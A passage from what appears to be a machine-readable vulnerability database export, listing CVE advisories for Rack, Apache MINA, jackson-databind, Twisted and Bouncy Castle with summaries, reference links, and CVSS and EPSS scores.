scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
13
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1588327
reference_id 1588327
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1588327
14
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:bouncycastle:bc-java:*:*:*:*:*:*:*:*
15
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
16
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-1000346
reference_id CVE-2016-1000346
reference_type
scores
0
value 4.3
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:P/I:N/A:N
1
value 3.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
2
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
3
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-1000346
17
reference_url https://github.com/advisories/GHSA-fjqm-246c-mwqg
reference_id GHSA-fjqm-246c-mwqg
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-fjqm-246c-mwqg
18
reference_url https://usn.ubuntu.com/3727-1/
reference_id USN-3727-1
reference_type
scores
url https://usn.ubuntu.com/3727-1/
fixed_packages
aliases CVE-2016-1000346, GHSA-fjqm-246c-mwqg
risk_score 2.1
exploitability 0.5
weighted_severity 4.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xzbt-bkdp-8bgh
83
url VCID-yw62-qbkq-9ygq
vulnerability_id VCID-yw62-qbkq-9ygq
summary 
Possible Information Leak / Session Hijack Vulnerability in Rack
There's a possible information leak / session hijack vulnerability in Rack. Attackers may be able to find and hijack sessions by using timing attacks targeting the session id. Session ids are usually stored and indexed in a database that uses some kind of scheme for speeding up lookups of that session id. By carefully measuring the amount of time it takes to look up a session, an attacker may be able to find a valid session id and hijack the session.

The session id itself may be generated randomly, but the way the session is indexed by the backing store does not use a secure comparison.

### Impact

The session id stored in a cookie is the same id that is used when querying the backing session storage engine.  Most storage mechanisms (for example a database) use some sort of indexing in order to speed up the lookup of that id.  By carefully timing requests and session lookup failures, an attacker may be able to perform a timing attack to determine an existing session id and hijack that session.

## Releases

The 1.6.12 and 2.0.8 releases are available at the normal locations.

### Workarounds

There are no known workarounds.

### Patches

To aid users who aren't able to upgrade immediately we have provided patches for
the two supported release series. They are in git-am format and consist of a
single changeset.

* 1-6-session-timing-attack.patch - Patch for 1.6 series
* 2-0-session-timing-attack.patch - Patch for 2.6 series

### Credits

Thanks Will Leinweber for reporting this!
references
0
reference_url http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00016.html
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00016.html
1
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-16782.json
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-16782.json
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2019-16782
reference_id
reference_type
scores
0
value 0.01251
scoring_system epss
scoring_elements 0.79334
published_at 2026-04-13T12:55:00Z
1
value 0.01251
scoring_system epss
scoring_elements 0.7936
published_at 2026-04-11T12:55:00Z
2
value 0.01251
scoring_system epss
scoring_elements 0.79336
published_at 2026-04-09T12:55:00Z
3
value 0.01251
scoring_system epss
scoring_elements 0.79327
published_at 2026-04-08T12:55:00Z
4
value 0.01251
scoring_system epss
scoring_elements 0.79301
published_at 2026-04-07T12:55:00Z
5
value 0.01251
scoring_system epss
scoring_elements 0.79291
published_at 2026-04-02T12:55:00Z
6
value 0.01251
scoring_system epss
scoring_elements 0.79285
published_at 2026-04-01T12:55:00Z
7
value 0.01251
scoring_system epss
scoring_elements 0.79345
published_at 2026-04-12T12:55:00Z
8
value 0.01251
scoring_system epss
scoring_elements 0.79315
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2019-16782
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16782
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16782
4
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
5
reference_url https://github.com/rack/rack
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rack/rack
6
reference_url https://github.com/rack/rack/commit/7fecaee81f59926b6e1913511c90650e76673b38
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rack/rack/commit/7fecaee81f59926b6e1913511c90650e76673b38
7
reference_url https://github.com/rack/rack/security/advisories/GHSA-hrqr-hxpp-chr3
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3
scoring_elements
1
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rack/rack/security/advisories/GHSA-hrqr-hxpp-chr3
8
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2019-16782.yml
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2019-16782.yml
9
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HZXMWILCICQLA2BYSP6I2CRMUG53YBLX
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HZXMWILCICQLA2BYSP6I2CRMUG53YBLX
10
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZXMWILCICQLA2BYSP6I2CRMUG53YBLX
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZXMWILCICQLA2BYSP6I2CRMUG53YBLX
11
reference_url https://nvd.nist.gov/vuln/detail/CVE-2019-16782
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2019-16782
12
reference_url http://www.openwall.com/lists/oss-security/2019/12/18/2
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://www.openwall.com/lists/oss-security/2019/12/18/2
13
reference_url http://www.openwall.com/lists/oss-security/2019/12/18/3
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://www.openwall.com/lists/oss-security/2019/12/18/3
14
reference_url http://www.openwall.com/lists/oss-security/2019/12/19/3
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://www.openwall.com/lists/oss-security/2019/12/19/3
15
reference_url http://www.openwall.com/lists/oss-security/2020/04/08/1
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://www.openwall.com/lists/oss-security/2020/04/08/1
16
reference_url http://www.openwall.com/lists/oss-security/2020/04/09/2
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://www.openwall.com/lists/oss-security/2020/04/09/2
17
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1789100
reference_id 1789100
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1789100
18
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=946983
reference_id 946983
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=946983
19
reference_url https://github.com/advisories/GHSA-hrqr-hxpp-chr3
reference_id GHSA-hrqr-hxpp-chr3
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hrqr-hxpp-chr3
20
reference_url https://access.redhat.com/errata/RHSA-2020:2480
reference_id RHSA-2020:2480
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2480
21
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
22
reference_url https://access.redhat.com/errata/RHSA-2021:1313
reference_id RHSA-2021:1313
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:1313
23
reference_url https://usn.ubuntu.com/USN-5253-1/
reference_id USN-USN-5253-1
reference_type
scores
url https://usn.ubuntu.com/USN-5253-1/
fixed_packages
aliases CVE-2019-16782, GHSA-hrqr-hxpp-chr3
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yw62-qbkq-9ygq
84
url VCID-z6er-42pm-7ubq
vulnerability_id VCID-z6er-42pm-7ubq
summary 
Cleartext Transmission of Sensitive Information in Apache MINA
Handling of the close_notify SSL/TLS message does not lead to a connection closure, leading the server to retain the socket opened and to have the client potentially receive clear text messages afterward. Mitigation: 2.0.20 users should migrate to 2.0.21, 2.1.0 users should migrate to 2.1.1. This issue affects: Apache MINA.
references
0
reference_url http://mina.apache.org/mina-project/index.html#mina-211-mina-2021-released-posted-on-april-14-2019
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://mina.apache.org/mina-project/index.html#mina-211-mina-2021-released-posted-on-april-14-2019
1
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-0231.json
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-0231.json
2
reference_url https://api.first.org/data/v1/epss?cve=CVE-2019-0231
reference_id
reference_type
scores
0
value 0.00707
scoring_system epss
scoring_elements 0.72172
published_at 2026-04-12T12:55:00Z
1
value 0.00707
scoring_system epss
scoring_elements 0.72187
published_at 2026-04-11T12:55:00Z
2
value 0.00707
scoring_system epss
scoring_elements 0.72158
published_at 2026-04-13T12:55:00Z
3
value 0.00726
scoring_system epss
scoring_elements 0.72583
published_at 2026-04-08T12:55:00Z
4
value 0.00726
scoring_system epss
scoring_elements 0.72544
published_at 2026-04-01T12:55:00Z
5
value 0.00726
scoring_system epss
scoring_elements 0.72552
published_at 2026-04-02T12:55:00Z
6
value 0.00726
scoring_system epss
scoring_elements 0.72568
published_at 2026-04-04T12:55:00Z
7
value 0.00726
scoring_system epss
scoring_elements 0.72545
published_at 2026-04-07T12:55:00Z
8
value 0.00726
scoring_system epss
scoring_elements 0.72595
published_at 2026-04-09T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2019-0231
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0231
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0231
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2019-0231
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:N/C:P/I:N/A:N
1
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2019-0231
5
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1102216
reference_id 1102216
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1102216
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1700016
reference_id 1700016
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1700016
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:mina:2.0.20:*:*:*:*:*:*:*
reference_id cpe:2.3:a:apache:mina:2.0.20:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:mina:2.0.20:*:*:*:*:*:*:*
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:mina:2.1.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:apache:mina:2.1.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:apache:mina:2.1.1:*:*:*:*:*:*:*
9
reference_url https://github.com/advisories/GHSA-5h29-qq92-wj7f
reference_id GHSA-5h29-qq92-wj7f
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5h29-qq92-wj7f
10
reference_url https://access.redhat.com/errata/RHSA-2020:0895
reference_id RHSA-2020:0895
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:0895
11
reference_url https://access.redhat.com/errata/RHSA-2020:0899
reference_id RHSA-2020:0899
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:0899
12
reference_url https://access.redhat.com/errata/RHSA-2020:1454
reference_id RHSA-2020:1454
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1454
13
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
fixed_packages
aliases CVE-2019-0231, GHSA-5h29-qq92-wj7f
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-z6er-42pm-7ubq
85
url VCID-ze79-6kcg-nfcp
vulnerability_id VCID-ze79-6kcg-nfcp
summary 
Deserialization of untrusted data in Jackson Databind
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity).
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-14195.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-14195.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-14195
reference_id
reference_type
scores
0
value 0.09511
scoring_system epss
scoring_elements 0.92836
published_at 2026-04-13T12:55:00Z
1
value 0.09511
scoring_system epss
scoring_elements 0.92837
published_at 2026-04-11T12:55:00Z
2
value 0.09511
scoring_system epss
scoring_elements 0.92832
published_at 2026-04-09T12:55:00Z
3
value 0.09511
scoring_system epss
scoring_elements 0.92829
published_at 2026-04-08T12:55:00Z
4
value 0.09511
scoring_system epss
scoring_elements 0.92819
published_at 2026-04-07T12:55:00Z
5
value 0.09511
scoring_system epss
scoring_elements 0.92816
published_at 2026-04-02T12:55:00Z
6
value 0.09511
scoring_system epss
scoring_elements 0.92809
published_at 2026-04-01T12:55:00Z
7
value 0.09511
scoring_system epss
scoring_elements 0.92821
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-14195
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14195
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14195
3
reference_url https://github.com/FasterXML/jackson-databind
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind
4
reference_url https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88
5
reference_url https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259
6
reference_url https://github.com/FasterXML/jackson-databind/issues/2765
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/issues/2765
7
reference_url https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-14195
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-14195
9
reference_url https://security.netapp.com/advisory/ntap-20200702-0003
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20200702-0003
10
reference_url https://www.oracle.com/security-alerts/cpuApr2021.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuApr2021.html
11
reference_url https://www.oracle.com/security-alerts/cpujan2021.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujan2021.html
12
reference_url https://www.oracle.com//security-alerts/cpujul2021.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com//security-alerts/cpujul2021.html
13
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
14
reference_url https://www.oracle.com/security-alerts/cpuoct2021.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2021.html
15
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1848958
reference_id 1848958
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1848958
16
reference_url https://github.com/advisories/GHSA-mc6h-4qgp-37qh
reference_id GHSA-mc6h-4qgp-37qh
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-mc6h-4qgp-37qh
17
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
18
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
19
reference_url https://usn.ubuntu.com/USN-4813-1/
reference_id USN-USN-4813-1
reference_type
scores
url https://usn.ubuntu.com/USN-4813-1/
fixed_packages
aliases CVE-2020-14195, GHSA-mc6h-4qgp-37qh
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ze79-6kcg-nfcp
86
url VCID-zx5n-czhy-6qgu
vulnerability_id VCID-zx5n-czhy-6qgu
summary In Twisted before 19.2.1, twisted.web did not validate or sanitize URIs or HTTP methods, allowing an attacker to inject invalid characters such as CRLF.
references
0
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00030.html
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00030.html
1
reference_url http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00042.html
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00042.html
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12387.json
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12387.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2019-12387
reference_id
reference_type
scores
0
value 0.00521
scoring_system epss
scoring_elements 0.66831
published_at 2026-04-04T12:55:00Z
1
value 0.00521
scoring_system epss
scoring_elements 0.66807
published_at 2026-04-02T12:55:00Z
2
value 0.00521
scoring_system epss
scoring_elements 0.66768
published_at 2026-04-01T12:55:00Z
3
value 0.00521
scoring_system epss
scoring_elements 0.66873
published_at 2026-04-12T12:55:00Z
4
value 0.00521
scoring_system epss
scoring_elements 0.66886
published_at 2026-04-11T12:55:00Z
5
value 0.00521
scoring_system epss
scoring_elements 0.66867
published_at 2026-04-09T12:55:00Z
6
value 0.00521
scoring_system epss
scoring_elements 0.66853
published_at 2026-04-08T12:55:00Z
7
value 0.00521
scoring_system epss
scoring_elements 0.66804
published_at 2026-04-07T12:55:00Z
8
value 0.00521
scoring_system epss
scoring_elements 0.6684
published_at 2026-04-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2019-12387
4
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12387
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12387
5
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
6
reference_url https://github.com/advisories/GHSA-6cc5-2vg4-cc7m
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/advisories/GHSA-6cc5-2vg4-cc7m
7
reference_url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2019-128.yaml
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/pypa/advisory-database/tree/main/vulns/twisted/PYSEC-2019-128.yaml
8
reference_url https://github.com/twisted/twisted
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted
9
reference_url https://github.com/twisted/twisted/commit/6c61fc4503ae39ab8ecee52d10f10ee2c371d7e2
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/twisted/twisted/commit/6c61fc4503ae39ab8ecee52d10f10ee2c371d7e2
10
reference_url https://labs.twistedmatrix.com/2019/06/twisted-1921-released.html
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
